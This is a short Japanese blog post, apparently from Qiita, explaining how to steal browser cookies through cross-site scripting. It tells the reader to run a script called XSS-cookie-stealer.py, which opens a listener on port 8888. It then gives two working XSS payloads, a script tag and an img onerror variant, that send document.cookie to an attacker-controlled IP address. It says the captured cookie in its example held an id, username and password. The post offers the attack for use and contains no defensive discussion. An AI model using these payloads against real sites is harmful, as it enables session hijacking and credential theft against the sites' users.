LoginSignup
0
0

More than 1 year has passed since last update.

@Hashibirokou(ハシビロコウ)

XSSでcookieを取得

Posted at

xssでcookieをとるのに便利なツール

使い方

まずはXSS-cookie-stealer.pyを実行する。これでポート8888でサーバがたつ。

python XSS-cookie-stealer.py

そしたら、xssの攻撃をする。

具体的に以下のようなペイロードを注入してやる(このペイロードは、XSS-cookie-stealer.py中のコメントでお勧めされてるもの):

<script> image = new Image(); image.src='http://X.X.X.X:8888/?'+document.cookie; </script>

X.X.X.Xはアタッカー側のIPアドレス。

ちなみに以下のペイロードでも可能:

<img src=x onerror=this.src='http://X.X.X.X:8888/?'%2bdocument.cookie;>

でもこれはonerrorに関するループの問題であまりお勧めできないと他の記事で書いてあった。

実際の様子(この例では、cookieがidとusernameとpassword):
cookie_stealer.png

0
0
0

Register as a new user and use Qiita more conveniently

  1. You get articles that match your needs
  2. You can efficiently read back useful information
  3. You can use dark theme
What you can do with signing up
Sign upLogin
0
0